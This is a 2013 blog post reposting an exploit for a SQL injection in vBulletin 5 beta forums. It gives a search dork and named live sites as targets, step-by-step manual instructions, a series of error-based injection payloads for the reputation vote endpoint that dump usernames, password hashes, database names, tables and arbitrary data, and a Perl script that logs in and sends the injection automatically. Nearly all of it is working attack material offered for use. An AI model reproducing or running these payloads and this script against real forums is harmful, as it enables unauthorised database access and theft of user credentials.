Tuesday, 21 May 2013

SQL vbulletin 5.x và code perl

#Title: vBulletin 5 SQL Injection > Beta Whatever
#Author: 0x0A
#Type: SQL Injection
#Requirements: Firefox/Live HTTP Headers/
#Software Link: http://www.vbulletin.com/purchases/
http://www.vbulletin.com/features/
#Version: 5 and above(not older versions)
#Tested on: Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
#Dork: "Powered by vBulletin™ Version 5.0.0 Beta"
#Demo sites to try: http://www.sultantheme.com/vb5connectforum/
http://vb5connect.com/bb/

How to manually inject :
-------------------------------------------------------------------
[#1] First of all, make an account to the vBulletin 5 forum,
-------------------------------------------------------------------


--------------------------------------------------------------------

[#2] After that, go to any topic and open Live HTTP Headers
--------------------------------------------------------------------

------------------------------------------------------------------------------------------
[#3] After that click the Like button, you will receive almost the same result as me. Go to the first POST record as the picture below and click Replay button,
-------------------------------------------------------------------------------------------

-------------------------------------------------------------------
[#4] Then, on Send POST Content use this :
-------------------------------------------------------------------
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT
concat(0x7e,0x27,username,0x27,0x7e,password,0x27, 0x7e) FROM user LIMIT 1,1) ) from information_schema.tables limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
---------------------------------------------------------------------------------------------

//Note that to keep the noteid value as it was as default in the POST Content. Instead you`ll get invalid noteid error.
The following SQLi command will fetch out the first record from user table(username/password).
-------------------------------------------------------------------

[#Other SQLi Syntaxes]

+-------------------------+
|Version():
+-------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e))
from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND
(1338=1338
+-------------------------+



+-------------------------+
|User():
+-------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e))
from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND
(1338=1338
+-------------------------+


+-------------------------+
|Database():
+-------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as
char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by
x)a) AND (1338=1338
+-------------------------+


+-------------------------+
|Database Print:
+-------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name
as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+-------------------------+


+-------------------------+
|Table Count:
+-------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT
concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xHEXCODEOFDATABASE))
from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND
(1338=1338
+-------------------------+


+-------------------------+
Print Tables:
+-------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as
char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xHEXCODEOFDATABASE LIMIT N,1)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+-------------------------+


+-------------------------+
|Columns of selected table:
+-------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT
concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE
table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+-------------------------+

+-------------------------+
|Fetch Out Data:
+-------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT
concat(0x7e,0x27,column1,0x27,0x7e,column2,0x27,0x 7e) FROM ANY_TABLE LIMIT N,1) ) from information_schema.tables limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+-------------------------+
CODE PERL
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;
use MIME::Base64;
system $^O eq 'MSWin32' ? 'cls' : 'clear';
print "
+===================================================+
|           vBulletin 5 Beta XX SQLi 0day           |
+===================================================+
";
if (@ARGV != 5) {
   print "\r\nUsage: perl vb5exp.pl WWW.HOST.COM VBPATH URUSER URPASS MAGICNUM\r\n";
   exit;
}
$host        = $ARGV[0];
$path        = $ARGV[1];
$username    = $ARGV[2];
$password    = $ARGV[3];
$magicnum    = $ARGV[4];
$encpath    = encode_base64('http://'.$host.$path);
print "[+] Logging\n";
print "[+] Username: ".$username."\n";
print "[+] Password: ".$password."\n";
print "[+] MagicNum: ".$magicnum."\n";
print "[+] " .$host.$path."auth/login\n";
my $browser = LWP::UserAgent->new;
my $cookie_jar = HTTP::Cookies->new;
my $response = $browser->post( 'http://'.$host.$path.'auth/login',
   [
       'url' => $encpath,
       'username' => $username,
       'password' => $password,
   ],
   Referer => 'http://'.$host.$path.'auth/login-form?url=http://'.$host.$path.'',
   User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
);
$browser->cookie_jar( $cookie_jar );
my $browser = LWP::UserAgent->new;
$browser->cookie_jar( $cookie_jar );
print "[+] Requesting\n";
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
   [
       'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338',
   ],
   User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
);
$data = $response->content;
if ($data =~ /(#((\\.)|[^\\#])*#)/) { print '[+] Version: '.$1 };
print "\n";
exit 1;

Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)